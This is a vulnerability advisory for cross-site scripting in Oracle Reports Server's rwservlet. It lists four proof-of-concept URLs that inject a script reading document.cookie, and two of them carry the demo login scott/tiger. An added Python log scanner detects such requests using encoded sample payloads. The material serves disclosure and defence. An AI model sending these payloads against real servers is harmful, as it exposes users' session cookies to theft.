Oracle Reports Server Multiple Cross-Site Scripting Vulnerabilities
No exploit is required to leverage these issues. The following proof of concept examples are available:

http://www.example.com:7778/reports/rwservlet/showenv?server=reptest&debug=<script>alert(document.cookie);</script>

http://www.example.com:7778/reports/rwservlet/parsequery?server=myserver&test=<script>alert(document.cookie);</script>

http://www.example.com:7778/reports/rwservlet?server=myserver+report=test.rdf+userid=scott/tiger@iasdb+destype=localFile+desformat=delimited+desname=FILE:+CELLWRAPPER=*+delimiter=<script>alert(document.cookie);</script>

http://www.example.com:7778/reports/rwservlet?server=myserver+report=test.rdf+userid=scott/tiger@iasdb+destype=localFile+desformat=delimited+desname=FILE:+CELLWRAPPER=<script>alert(document.cookie);</script>
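For defenders reviewing web server logs, the following added example (not part of the original advisory) flags requests to the rwservlet path whose parameter values decode to tag-like markup, including double percent-encoded values. It assumes common/combined-format access logs; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Tag-like markup: '<' followed by a letter, '/' or '!'.
MARKUP_RE = re.compile(r"<\s*[a-z/!]", re.I)

def decode_fully(value, rounds=3):
    """Undo up to `rounds` layers of percent-encoding (catches double encoding)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(url):
    """Return sorted names of rwservlet parameters whose decoded value holds markup."""
    path, _, query = url.partition("?")
    if "/reports/rwservlet" not in path.lower():
        return []
    hits = set()
    # The advisory's URLs separate key=value pairs with '&' and with '+'.
    for pair in re.split(r"[&+]", query):
        name, _, value = pair.partition("=")
        if MARKUP_RE.search(decode_fully(value)):
            hits.add(name.lower())
    return sorted(hits)

def scan(log_lines):
    """Return [(line_number, [parameter names])] for every flagged request."""
    flagged = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        names = suspicious_params(match.group(1)) if match else []
        if names:
            flagged.append((number, names))
    return flagged

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /reports/rwservlet/showenv?server=reptest HTTP/1.1" 200 5120',
    '192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /reports/rwservlet/showenv?server=reptest&debug=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 5300',
    '192.0.2.12 - - [01/Jan/2024:10:00:09 +0000] "GET /reports/rwservlet?server=myserver+report=test.rdf+delimiter=%253Cscript%253Ealert(1)%253C%252Fscript%253E HTTP/1.1" 200 811',
    '192.0.2.13 - - [01/Jan/2024:10:00:12 +0000] "GET /index.html?q=%3Cb%3E HTTP/1.1" 200 120',
]

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

The check only looks for tag markup in the request target, so it will not see values sent in a POST body or payloads that avoid angle brackets.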